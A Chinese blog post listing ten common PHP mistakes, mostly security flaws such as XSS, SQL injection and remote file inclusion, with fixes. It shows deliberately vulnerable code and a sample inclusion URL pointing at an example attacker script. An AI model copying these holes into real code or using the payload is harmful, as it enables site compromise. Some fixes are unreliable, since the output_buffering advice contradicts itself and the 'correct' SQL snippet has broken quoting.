`

PHP程序员最易犯10种错误

    博客分类:
  • php
阅读更多


PHP是个伟大的web开发语言,灵活的语言,但是看到php程序员周而复始的犯的一些错误。我做了下面这个列表,列出了PHP程序员经常犯的10中错误,大多数和安全相关。看看你犯了几种

1.不转意html entities

一个基本的常识:所有不可信任的输入(特别是用户从form中提交的数据) ,输出之前都要转意。

echo $_GET['usename'] ;

这个例子有可能输出:

<script>/*更改admin密码的脚本或设置cookie的脚本*/</script>

这是一个明显的安全隐患,除非你保证你的用户都正确的输入。

如何修复 :

我们需要将”< “,”>”,”and” 等转换成正确的HTML表示(< , >’, and “),函数htmlspecialchars 和 htmlentities()正是干这个活的。

正确的方法:

echo htmlspecialchars($_GET['username'], ENT_QUOTES);

2. 不转意SQL输入

我曾经在一篇文章中最简单的防止sql注入的方法(php+mysql中) 讨论过这个问题并给出了一个简单的方法 。有人对我说,他们已经在php.ini中将magic_quotes设置为On,所以不必担心这个问题,但是不是所有的输入都是从$_GET, $_POST或 $_COOKIE中的得到的!

如何修复:

和在最简单的防止sql注入的方法(php+mysql中) 中一样我还是推荐使用mysql_real_escape_string()函数

正确做法:

<?php

$sql = “UPDATE users SET

name=’.mysql_real_escape_string($name).’

WHERE id=’.mysql_real_escape_string ($id).’”;

mysql_query($sql);

?>

3.错误的使用HTTP-header 相关的函数: header(), session_start(), setcookie()

遇到过这个警告吗?“warning: Cannot add header information – headers already sent [....]

每次从服务器下载一个网页的时候,服务器的输出都分成两个部分:头部和正文。

头部包含了一些非可视的数据,例如cookie。头部总是先到达。正文部分包括可视的html,图片等数据。

如果output_buffering 设置为Off,所有的HTTP-header相关的函数必须在有输出之前调用。问题在于你在一个环境中开发,而在部署到另一个环境中去的时候,output_buffering 的设置可能不一样。结果转向停止了,cookie和session都没有正确的设置……..。

如何修复:

确保在输出之前调用http-header相关的函数,并且令output_buffering = Off



4. Require 或 include 的文件使用不安全的数据

再次强调:不要相信不是你自己显式声明的数据。不要 Include 或 require 从$_GET, $_POST 或 $_COOKIE 中得到的文件。

例如:

index.php

<?

//including header, config, database connection, etc

include($_GET['filename']);

//including footer

?>

现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt

来获取你的机密信息,或执行一个PHP脚本。

如果allow_url_fopen =On ,你更是死定了:

试试这个输入:

http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

现在你的网页中包含了http://www.youaredoomed.com/phphack.php 的输出. 黑客可以发送垃圾邮件,改变密码,删除文件等等。只要你能想得到。

如何修复:

你必须自己控制哪些文件可以包含在的include或require指令中。

下面是一个快速但不全面的解决方法:

<?

//Include only files that are allowed.

$allowedFiles = array(’file1.txt’,'file2.txt’,'file3.txt’);

if(in_array((string)$_GET['filename'],$allowedFiles)) {

include($_GET['filename']);

}

else{

exit(’not allowed’);

}

?>

5. 语法错误

语法错误包括所有的词法和语法错误,太常见了,以至于我不得不在这里列出。解决办法就是认真学习PHP的语法,仔细一点不要漏掉一个括号,大括号,分号,引号。还有就是换个好的编辑器,就不要用记事本了!

6.很少使用或不用面向对象

很多的项目都没有使用PHP的面向对象技术,结果就是代码的维护变得非常耗时耗力。PHP支持的面向对象技术越来越多,越来越好,我们没有理由不使用面向对象。

7. 不使用framework

95% 的PHP项目都在做同样的四件事: Create, edit, list 和delete. 现在有很多MVC的框架来帮我们完成这四件事,我们为何不使用他们呢?

8. 不知道PHP中已经有的功能

PHP的核心包含很多功能。很多程序员重复的发明轮子。浪费了大量时间。编码之前搜索一下 PHP mamual,在google上检索一下,也许会有新的发现!PHP中的exec()是一个强大的函数,可以执行cmd shell,并把执行结果的最后一行以字符串的形式返回。考虑到安全可以使用EscapeShellCmd()

9.使用旧版本的PHP

很多程序员还在使用PHP4,在PHP4上开发不能充分发挥PHP的潜能,还存在一些安全的隐患。转到PHP5上来吧,并不费很多功夫。大部分PHP4程序只要改动很少的语句甚至无需改动就可以迁移到PHP5上来。根据http://www.nexen.net 的调查 只有12%的PHP服务器使用PHP5,所以有88%的PHP开发者还在使用PHP4.

10.对引号做两次转意

见过网页中出现\’或\’”吗?这通常是因为在开发者的环境中magic_quotes 设置为off ,而在部署的服务器上magic_quotes =on . PHP会在 GET, POST 和 COOKIE中的数据上重复运行addslashes() 。

原始文本:

It’s a string

magic quotes on :

It\’s a string

又运行一次

addslashes():

It\\’s a string

HTML输出:

It\’s a string

还有一种情况就是,用户一开始输入了错误的登录信息,服务器检测到错误输入后,输出同样的form要求用户再次输入,导致用户的输入转意两次!
分享到:
评论

相关推荐

    PHP程序员编程注意事项

    以下是PHP程序员最易犯的四种错误及其解决方法: 1. 不转义HTML实体:不转义用户输入的HTML实体是一个重大的安全隐患,可能导致跨站脚本(XSS)攻击。当输出用户提供的数据时,应当使用`htmlspecialchars()`或`...

    PHP程序员常见的40个陋习,你中了几个?

    以下列举的40个陋习,是大多数PHP程序员容易犯的错误。这些陋习不仅会妨碍个人成长,还可能给项目带来负面影响。 1. 不写注释:注释是代码的文档,有助于他人理解代码的功能和实现方式。缺少注释会让其他开发者难以...

    Python 2.5

    如果人工来做,这会是一个很繁琐而且容易犯错误的过程,你总会遗漏东西,到头来你还得重做以前的工作。Python对列表和字典的本地支持使复杂的数据转换更加容易。而且这种交互式模式可以让编程人员在转换过程的每一...

    基于COMSOL有限元仿真的三相变压器多物理耦合模型:电磁-声-结构力综合分析 有限元仿真

    内容概要:本文详细介绍了如何利用COMSOL Multiphysics有限元仿真平台构建三相变压器的多物理耦合模型,涵盖电磁场、声场和结构力学三个主要方面。首先,通过构建精确的三维模型并设定材料属性,实现了对变压器各部件的物理特性定义。接着,分别进行了电磁场、声场和结构力场的分析,探讨了磁密分布、噪声产生机制及机械应力变化。最后,通过仿真结果的图表和动画展示,深入分析了变压器的能量转换效率、噪声水平和机械强度,提出了优化设计和改进措施。 适合人群:从事电气工程、电力系统设计与维护的技术人员,以及对多物理场仿真感兴趣的科研工作者。 使用场景及目标:适用于希望深入了解三相变压器工作原理及其多物理场耦合特性的研究人员和技术人员。目标是提高变压器设计的科学性和可靠性,降低能耗和噪音污染,确保设备的安全稳定运行。 阅读建议:读者可以通过本文了解COMSOL仿真软件的具体应用方法,掌握多物理场耦合建模的基本流程,并借鉴文中提供的分析思路和解决方案,应用于实际工程项目中。

    MATLAB脚本工具在BP神经网络模型计算声品质研究分析中的应用

    内容概要:本文介绍了MATLAB脚本工具在BP神经网络模型计算声品质研究分析中的应用。首先阐述了声品质研究的重要性及其在多个行业中的关键作用,接着详细解释了BP神经网络的工作原理及其在声品质研究中的应用。然后重点讨论了MATLAB在BP神经网络建模中的重要作用,包括数据处理、模型构建、参数设置和训练算法等方面的强大支持。最后提供了一个简单的MATLAB脚本示例,展示了如何使用MATLAB构建和训练BP神经网络模型来进行声品质研究分析。 适合人群:从事声品质研究的科研人员、工程师以及相关领域的研究生。 使用场景及目标:① 提升对声品质的理解和预测能力;② 利用BP神经网络模型提高声品质研究的准确性和可靠性;③ 掌握MATLAB脚本工具的具体使用方法,以便更好地应用于实际项目。 其他说明:本文不仅强调理论知识,还提供了实用的操作示例,有助于读者快速上手并应用于实际研究中。

    基于TensorFlow和Keras的人工智能课程设计:实现端到端不定长中文字符检测与识别源码及数据集

    该项目实现了基于TensorFlow和Keras的端到端不定长中文字符检测与识别,已获高分通过。包含约364万张图片的数据集,按99:1划分为训练集和验证集,数据由中文语料库生成,并经过多种变化处理。项目涵盖了汉字、英文字母、数字及标点在内的5990个字符的识别任务,并使用文本检测、文本识别算法以及Transformer模型和pyttsx3库实现从识别到翻译再到输出的过程。内附文档等资料。。内容来源于网络分享,如有侵权请联系我删除。

    激光熔覆技术中双椭球热源模型的COMSOL仿真与数值模拟研究 激光熔覆

    内容概要:本文详细介绍了基于COMSOL仿真的双椭球热源模型在激光熔覆技术中的应用。首先阐述了双椭球热源模型的基本概念及其在描述激光熔覆过程中能量分布和传递方面的优越性。接着讨论了材料热物性参数(如热传导率、比热容、相变潜热)对熔覆过程的影响,并引入了马兰戈尼效应和布辛涅斯克近似,解释它们在模拟表面张力变化和简化流体动力学方程中的作用。随后介绍了动网格技术在模拟熔覆层形成和演变过程中的应用。最后,强调了COMSOL仿真环境的强大功能,能够综合以上各要素进行精确的温度场和流场计算。文章还展望了未来激光熔覆技术的发展方向,包括提高熔覆层质量和优化工艺参数。 适合人群:从事激光熔覆技术研发的专业人士、材料科学领域的研究人员、机械制造行业的工程师。 使用场景及目标:①帮助科研人员深入了解激光熔覆过程中的物理机制;②指导工程师优化激光熔覆工艺参数;③为新材料的研发提供理论支持和技术手段。 其他说明:本文不仅提供了详细的理论背景和技术细节,还对未来的研究趋势进行了预测,是一篇兼具学术价值和实际应用意义的文章。

    基于Simulink仿真的FOC电流环PI参数自整定模型:电机控制系统优化与智能化升级 电机控制 FOC电流环PI参数自整定Simulink仿真模型

    内容概要:本文详细介绍了基于Simulink仿真的FOC电流环PI参数自整定模型及其应用。首先阐述了FOC电流环PI参数自整定的基本原理,即通过传感器输出的角度和速度信息,利用PI控制器实现对电流的精确控制,并根据电机实际运行状态自动调整比例系数和积分系数。接着,重点介绍了该模型的特点,如采用有感FOC控制最小系统、支持无传感器控制升级、标幺值系统便于参数调整、离散式步长仿真确保准确性、模块化结构利于二次开发、所有参数随用随改以及电流环PI参数自动整定。最后,讨论了该模型在电机控制策略研究、不同负载特性的测试以及教育领域的应用价值。 适合人群:从事电机控制技术研发的专业人士、高校师生及相关研究人员。 使用场景及目标:①研究和测试各种电机控制策略;②模拟不同负载特性,评估电机性能;③帮助学生理解和掌握电机控制原理及FOC控制技术。 其他说明:文中提及的PI参数自整定原理参考了知乎的相关文章,提供了进一步的学习资源。

    机器学习在电力系统瞬态稳定性评估中的应用:去噪自编码器与集成分类器 电力系统

    内容概要:本文探讨了利用机器学习技术提升电力系统瞬态稳定性的方法。具体来说,采用了去噪堆叠自编码器进行数据预处理,去除电力数据中的噪声,提取有效特征。然后使用集成分类器(包括支持向量机和随机森林),通过投票机制提高分类准确性。文中展示了完整的代码实现流程,以及在实际省级电网数据上的应用效果。结果显示,相比传统方法,新模型不仅将预测时间缩短至800毫秒以内,还达到了98.7%的高准确率。 适合人群:从事电力系统研究的技术人员、数据科学家、机器学习爱好者。 使用场景及目标:适用于需要快速准确地评估电力系统稳定性的场合,如电网调度中心、电力公司等。主要目标是在短时间内做出可靠的稳定性判断,防止电力故障扩大。 其他说明:文章强调了机器学习在处理大规模电力数据方面的优势,特别是其能够自动发现复杂非线性关系的特点。此外,文中提供的代码可以作为相关领域的参考实现。

    毕业设计-微课神器 4.8.4-整站商业源码.zip

    毕业设计-微课神器 4.8.4-整站商业源码.zip

    永磁同步电机NSMDO与DBCC联合控制策略及其仿真实现 FPGA 永磁同步电机新型控制方法:NSMDO速度环+DBCC电流环,基于滑模扰动观测器与无差拍电流预测控制

    内容概要:本文探讨了永磁同步电机(PMSM)的一种创新控制策略,即新型滑模扰动观测器控制(NSMDO)与无差拍电流预测控制(DBCC)的联合应用。文中详细介绍了两种控制方式的具体实现方法,包括MATLAB中的NSMDO观测器函数以及C语言中的DBCC电压预测函数。NSMDO用于速度环,通过引入自适应增益的非奇异终端滑模面提高系统的抗干扰能力和动态性能;DBCC则应用于电流环,利用离散化模型预测未来两个控制周期的电流状态,从而加快电流跟踪速度。实验结果显示,在突加载荷情况下,相比传统的PI控制器,该联合控制策略能够显著减小转速波动并大幅提高电流响应速度。 适用人群:从事电机控制系统设计的研究人员和技术工程师,尤其是关注高性能PMSM控制方案的专业人士。 使用场景及目标:适用于需要高精度、快速响应的工业自动化设备和电动汽车等领域,旨在提升系统稳定性和效率。 其他说明:文中还提到了一些实际调试过程中可能遇到的问题及解决方案,如确保采样周期与PWM周期同步以避免电流毛刺现象,以及针对电感值误差可能导致的稳态电流波动提出了改进措施。

    基于matlab的Simulink 进行自适应 MPC 设计.zip

    基于matlab的Simulink 进行自适应 MPC 设计.zip

    基于MatlabSimulink的无线功率传输与三相两电平逆变器供电的无刷直流电机仿真技术解析 三相两电平逆变器

    内容概要:本文详细介绍了利用Matlab/Simulink进行无线功率传输与三相两电平逆变器供电的无刷直流电机仿真的方法和技术要点。首先解释了三相两电平逆变器的工作原理及其在Simulink中的具体实现步骤,包括选择合适的模块如Universal Bridge以及正确设置参数如Dead time等。接着阐述了无线功率传输部分的设计,特别是互感系数的设定和次级侧电容的作用。然后深入探讨了无刷直流电机的换相逻辑和速度环控制,提供了具体的换相逻辑真值表和PID控制器参数。最后给出了一些仿真提速技巧,如调整求解器设置和优化仿真参数。整个过程中强调了理论与实践相结合的重要性。 适合人群:对电力电子系统建模与仿真感兴趣的工程技术人员,尤其是从事电机控制系统研究和开发的专业人士。 使用场景及目标:适用于需要理解和掌握无线功率传输与三相两电平逆变器供电的无刷直流电机仿真技术的研究人员和工程师。目标是帮助读者能够独立完成从搭建模型到优化仿真的全过程。 其他说明:文中提供的代码片段和参数设置为实际应用提供了宝贵的参考资料,同时提醒读者注意一些容易忽视的技术细节,确保仿真的稳定性和准确性。

    王子与狐狸scratch项目,实现起来也比较简单,并且的话,也非常好玩,容易上手

    这个课件是我本人上过,并且完全自创的项目,项目非常有意思 通过左右按键控制王子,去接苹果,狐狸会跑到树上去,扔苹果,一共可以扔10个,但是需要注意,需要提前备课,这节课还是比较出现代码问题的 学生们玩的很开心,但要注意的是,这个需要一些基础,最好是已经学完了scratch半学期以上,上没有限制 有待完成版和完成版,还有自制精美课件

    excel列转行vba代码

    excel获取一年内的周一公式 excel进行列转行的vba代码

    【数据结构入门】2.1.1+2线性表(持续更新ing)(线性表的定义、特点、逻辑特征及其存储结构)

    2.1.1+2线性表(线性表的定义和特点和案例分析)

    基于STM32蓝牙小车的毕业设计

    用安卓APP控制,附论文,驱动模块、文档等待 电机驱动模块、L298N 主控板、 蓝牙通信模块、FBT06_LPDB android控制端等 首先,给电源模块上12v的电源,然后打开电机驱动模块开关,同时将主控板的供电端连接到电源管理模块。然后,在android手机上安装“蓝牙通信”应用程序后,打开该APP,然后选择“允许打开蓝牙”。点击设备列表中的“开始搜索按钮”,在设备列表中选择蓝牙模块的名字进行连接。 完成上述工作以后,就可以在手机上通过按下“start”、“left”、“stop”、“right”、“back”通过蓝牙给小车发送“前进”、“左转”、“停止”、“右转”、“后退”5个命令。小车可以解析命令轻松进行前进、后退、左转、右转和停止。

    COMSOL相控阵超声仿真技术:phased_array_focus与压力声学模块的应用及MPH文件管理 压力声学模块 基于Comsol相控阵超声仿真技术的压力声学模块及其在mph文件中的应用与相控阵

    内容概要:本文详细介绍了COMSOL相控阵超声仿真技术,重点探讨了phased_array_focus(相控阵聚焦)和压力声学模块的功能与应用。相控阵超声技术通过控制声波的相位和振幅实现精确聚焦,而压力声学模块则用于模拟声波在不同介质中的传播特性。此外,文章还讨论了MPH文件在仿真过程中的重要性和面临的挑战,强调了数据管理和分析的方法。 适合人群:从事超声技术研究、仿真建模以及相关工程领域的研究人员和技术人员。 使用场景及目标:帮助读者理解相控阵超声仿真的核心技术,掌握压力声学模块的使用方法,提高对MPH文件的管理与分析能力,从而优化相控阵超声系统的设计和性能。 其他说明:文章采用通俗易懂的语言解释复杂的仿真技术和概念,旨在激发读者对该领域的兴趣并促进实际应用中的创新和发展。

    API方式实现COPY调用

    API方式实现COPY调用

Global site tag (gtag.js) - Google Analytics